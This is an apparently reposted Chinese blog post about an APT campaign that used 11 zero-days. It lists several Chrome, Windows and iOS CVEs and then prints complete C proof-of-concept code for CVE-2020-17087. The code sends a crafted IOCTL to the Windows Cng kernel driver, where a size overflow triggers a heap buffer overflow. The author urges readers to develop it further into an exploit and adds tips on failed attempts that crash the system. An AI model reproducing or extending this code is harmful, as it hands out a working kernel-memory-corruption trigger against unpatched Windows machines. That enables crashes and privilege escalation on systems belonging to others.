神秘黑客組織利用11個0 day漏洞發起攻擊

多的我也懶得寫，寫幾個信息點。自己拓展去。


CVE-2020-15999 - Chrome Freetype堆緩存溢出漏洞；

CVE-2020-17087 - Windows cng.sys中的堆緩存溢出漏洞；

CVE-2020-16009 - TurboFan map deprecation中的Chrome type confusion

CVE-2020-16010 – Chrome安卓版堆緩存溢出漏洞

CVE-2020-27930 - Safari 任意棧讀寫漏洞

CVE-2020-27950 - iOS XNU kernel 內存泄露漏洞

CVE-2020-27932 - iOS kernel type confusion with turnstiles

吐槽:放著這不搞，搞那些啥亂七八糟的東西…
windows: CVE-2020-17087的poc就放在這，有興趣接著往下搞。

#pragma comment(lib, "ntdll")#include <cstdio> #include <windows.h>int main() {HANDLE hCng = CreateFileA("\\\\.\\GLOBALROOT\\Device\\Cng",GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);if (hCng == NULL) {printf("[-] Failed to open \\Device\\Cng: %u\n", GetLastError());return 1;}printf("[+] \\Device\\Cng opened, handle: %p\n", hCng);//// DataBufferSize overflows when used for allocating memory in// cng!CfgAdtpFormatPropertyBlock as (uint16)(DataBufferSize * 6).//// In this proof-of-concept, an allocation of (uint16)(0x2AAB * 6) = 2// bytes is requested while 0x2AAB * 6 = 0x10002 bytes are written to it.//CONST DWORD DataBufferSize = 0x2AAB;CONST DWORD IoctlSize = 4096 + DataBufferSize;BYTE *IoctlData = (BYTE *)HeapAlloc(GetProcessHeap(), 0, IoctlSize);RtlZeroMemory(IoctlData, IoctlSize);*(DWORD*) &IoctlData[0x00] = 0x1A2B3C4D;*(DWORD*) &IoctlData[0x04] = 0x10400;*(DWORD*) &IoctlData[0x08] = 1;*(ULONGLONG*)&IoctlData[0x10] = 0x100;*(DWORD*) &IoctlData[0x18] = 3;*(ULONGLONG*)&IoctlData[0x20] = 0x200;*(ULONGLONG*)&IoctlData[0x28] = 0x300;*(ULONGLONG*)&IoctlData[0x30] = 0x400;*(DWORD*) &IoctlData[0x38] = 0;*(ULONGLONG*)&IoctlData[0x40] = 0x500;*(ULONGLONG*)&IoctlData[0x48] = 0x600;*(DWORD*) &IoctlData[0x50] = DataBufferSize; // OVERFLOW*(ULONGLONG*)&IoctlData[0x58] = 0x1000;*(ULONGLONG*)&IoctlData[0x60] = 0;RtlCopyMemory(&IoctlData[0x200], L"FUNCTION", 0x12);RtlCopyMemory(&IoctlData[0x400], L"PROPERTY", 0x12);ULONG_PTR OutputBuffer = 0;DWORD BytesReturned;BOOL Status = DeviceIoControl(hCng,0x390400,IoctlData,IoctlSize,&OutputBuffer,sizeof(OutputBuffer),&BytesReturned,NULL);printf("[+] Ioctl sent, Status: %d, OutputBuffer: %zx\n", Status, OutputBuffer);HeapFree(GetProcessHeap(), 0, IoctlData);CloseHandle(hCng);return 0; }

不建議使用BCrypt，寫成功10個有9個還是藍屏，1個還是編不過。建議沿著原作者的思路走，最起碼他成功了。

總結

以上是生活随笔為你收集整理的Google: Sophisticated APT Group Burned 11 Zero-Days in Mass Spying Operation的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。